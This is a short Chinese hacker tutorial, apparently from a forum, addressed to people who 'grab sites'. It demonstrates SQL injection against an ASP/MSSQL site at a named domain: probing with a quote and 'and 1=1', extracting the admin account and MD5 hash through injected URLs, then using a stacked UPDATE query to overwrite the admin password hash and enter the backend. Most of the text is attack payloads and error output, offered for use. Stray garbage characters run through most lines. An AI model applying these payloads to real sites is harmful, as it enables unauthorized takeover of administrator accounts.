经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。' z Y. T) {" m2 t( x/ N
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)( P6 w7 i8 U6 S1 Y( c' G
测试如下:
C- `% _% e) ^, f) n1 T' e) {http://www.tmdsb.com/news.asp?id=121
, {! H* _& k* h7 r- A" U$ Y在地址后输入单引号,显示6 G0 H. ^1 y* P7 y
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
5 M9 ^3 f7 m% o, @( O字符串 ’’’ 之前有未闭合的引号
: l: X0 A. T" R/news/tmdws.asp,行63
7 v; ^( e" ]9 U4 ]" Z; H( Q9 p说明没有过滤单引号且数据库是MSSQL.
9 ^+ {. u* J Dand 1=1正常。and 1=2出错。肯定存在注入+ u1 K; F1 N$ o% [" w
接着输入( K- |( t4 d" L( q( F
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
! ^- B3 l& x x得到帐号为:admin- O: L, v' ?0 Q- y6 |; y# C+ u
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin). K4 |: [+ T& @1 g$ A
得到密码为:a4716077c2ba075c
4 k, c3 x7 o) l% t. ~ W$ v接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
2 [9 j# ]* s& c% l( {! B命令如下 :
; X2 X' _% W% f% n3 U, ], k0 `6 v;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–2 P7 g1 E$ f) U8 f
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |